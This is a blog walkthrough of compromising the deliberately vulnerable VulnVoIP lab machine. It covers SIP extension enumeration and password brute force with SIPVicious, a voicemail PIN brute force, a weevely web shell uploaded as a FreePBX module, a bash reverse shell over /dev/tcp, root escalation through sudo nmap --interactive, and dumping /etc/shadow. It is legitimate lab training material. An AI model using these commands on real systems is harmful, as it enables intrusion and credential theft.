Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

Hello All,

So, I decided to refresh my knowledge about pentesting VoIP and test viproy against old VulnVoIP image. You can download it from https://www.rebootuser.com/?p=1069

Idea was not to use Freebpx exploit to gain access, lets start "Hard" mode.

 

First of all we need to convert virtual machine image from VmWare to VirtualBox compatible, to do it we will convert it to OVA format using ovftool, which can be downloaded from VmWare web site.

Command to convert is very easy:

ovftool vulnVoIP.vmx /path/vulnVoIP.ovf

After it converts just import it to VirtualBox and that's all.

 

Ok, we finish preparation and now ready to start VulnVoIP VM. Don't forget to configure network interface, I prefer Host-Only adapter.

 Lets start from ports scanning as usual, both TCP and UDP, results is below:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
53/tcp   open  domain     dnsmasq 2.45
80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
740/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
4445/tcp open  upnotifyp?
5038/tcp open  asterisk   Asterisk Call Manager 1.1

53/udp   open          domain    dnsmasq 2.45
68/udp   open|filtered dhcpc
111/udp  open          rpcbind   2 (RPC #100000)
631/udp  open|filtered ipp
5060/udp open          sip-proxy Asterisk PBX 1.6.2.11
|_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
5353/udp open          mdns      DNS-based service discovery

After first look I decided to try 5038/tcp port with default password, I used metasploit module for it - auxiliary/voip/asterisk_login.

[+] 192.168.56.101:5038   - User: "admin" using pass: "amp111" - We can login on 192.168.56.101:5038!

If you don't know how to use read this information: https://www.voip-info.org/wiki/view/Asterisk+manager+API

Lets start:

nc -nv 192.168.56.101 5038
(UNKNOWN) [192.168.56.101] 5038 (?) open
Asterisk Call Manager/1.1
Action: Login
Username: admin
Secret: amp111

Response: Success
Message: Authentication accepted

To list all available commands use action ListCommands. Lets enumerate all sip users:

Action: command
Command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT
100                                                          from-internal    Yes  Always
101                        s3cur3                            from-internal    Yes  Always
102                        letmein123                        from-internal    Yes  Always
201                        secret123                         from-internal    Yes  Always
200                        quit3s3curE123                    from-internal    Yes  Always
2000                       password123                       from-internal    Yes  Always
--END COMMAND--

Wow, nice, but my goal is to test viproy againt VulnVoIP, lets forget about this results and continue with 5060/udp.

Download and install viproy to metasploit and lets try to enumerate extensions and brute passwords later.

Some time later....

Viproy shows a lot of false positive when use different methods, I tried to understand why, but could not. Decided not to spent a time and use verified SIPVicious - https://github.com/EnableSecurity/sipvicious

This tool is well known and is installed in Kali linux, lets start from enumeration extensions:

svwar -p 5060 192.168.56.101 -m INVITE -e 100-2000

| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 2000      | reqauth        |
| 102       | reqauth        |
| 100       | weird          |
| 101       | reqauth        |

And now bruteforce passwords, I will use SecLists dictionaries and EXTENSION from above list:

svcrack -p 5060 -u EXTENSION -d /opt/SecLists/Passwords/10_million_password_list_top_10000.txt 192.168.56.101 -v

So, results are:

| Extension | Password      |
-----------------------------
| 100       | [no password] |
| 2000      | password123 |

Ok, we found 1 password. Its possible to extend bruteforce by using huge dictionaries, but 1 cracked extension is enough to proceed.
What is next? Idk, freepbx - password isnt working, and we don't know username. Default username and password isn't working.


http://192.168.56.101/recordings/index.php - Voicemail portal, but couldnt login...Use your Voicemail Mailbox and Password - is written, we can use command sip show peer 2000 to identify context for extension 2000, its default.
Now we can recieve information about voice messages for this extension:

Ok, we see that there is one voice messages and username support, next step was to brute Freepbx Voicemail portal.

The Voicemail password usually is different from extension password, i.e. 'password123', because voicemail is usually used from phones - it can be only digits..

Use crunch to generate wordlist:

crunch 1 4 0123456789 -o 2000.list.txt
Intercept login request with Burp and start bruteforce with intruder. To brute http post login you can use another tools, like patator,hydra etc.

And we got the password: 2000 / 0000 . Firstly I tried 2000@default, second time only 2000.
Now we can download voice message and listen it. Note, ofc we can install sip software phone, connect to PBX and use *97 to listen message, but we need voicemail password in this way also.

 After messages was listen we understand which username and password are for Freepbx administration login. Lets login.

What we see, it is possible to upload custom module for Freepbx, so we can do it, if someone doesn't know how to do it - https://packetstormsecurity.com/files/102125/FreePBX-2.9.0.6-Shell-Upload.html

So we need to create directory, put our webshell inside, zip it and upload.

I will use weevely as a web shell: tar -cvzf weevely-0.1.tar.gz weevely/

Webshell is available here: http://192.168.56.101/admin/modules/weevely/weevely.php

weevely http://192.168.56.101/admin/modules/weevely/weevely.php PASSWORD
This email address is being protected from spambots. You need JavaScript enabled to view it.:/var/www/html/admin/modules/weevely $ id
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)

Nice, we are inside, next step which I usually do is check sudo permissions:

This email address is being protected from spambots. You need JavaScript enabled to view it.:/tmp $ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAM$

Runas and Command-specific defaults for asterisk:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAM$

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /usr/bin/nmap

And got mysql password from freepbx config file:

Also, now we know mysql creds: cat amportal.conf
# AMPDBHOST: the host to connect to the database named 'asterisk'
AMPDBHOST=localhost
# AMPDBUSER: the user to connect to the database named 'asterisk'
AMPDBUSER=freepbx
# AMPDBENGINE: the type of database to use
AMPDBENGINE=mysql
# AMPDBPASS: the password for AMPDBUSER
AMPDBPASS=fpbx

So, connections to mysql are not allowed from remote hosts, lets catch reverse netcat connection and elevate privileges. To do it upload netcat with exec command after connection feature, how to do it - read write-up about Vuln Docker VM.

Fire up netcat listener and use bash reverse shell:
bash -i >& /dev/tcp/192.168.56.1/7777 0>&1

Now we can use nmap --interactive, below you can find what was done without comments, because it easy to understand:

bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> ! id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
waiting to reap child: No child processes (10)

Execute ! /bin/bash and we are root:
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Found info:
cat .asterisk_history
_HiStOrY_V2_

cat /etc/shadow
root:$1$1Di75Uog$LPNS2VjMMW.MoETGLQ4hU/:15626:0:99999:7:::

Try to uncover root password - no results:

john --wordlist=/usr/share/wordlists/rockyou.txt root.passwd.txt


Of course, we don't need root password, because can create ssh keys for user root.

cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be
Its md5: cc614640424f5bd60ce5d5264899c3be MD5 : Reb00tu53r

So, server is pwned, root rights gained, thats all.

 

P.S.: This vulnerable VoIP is old, I know, if you know new one - let me know in the comments.

 

Cheers

 

 

Add comment


Security code
Refresh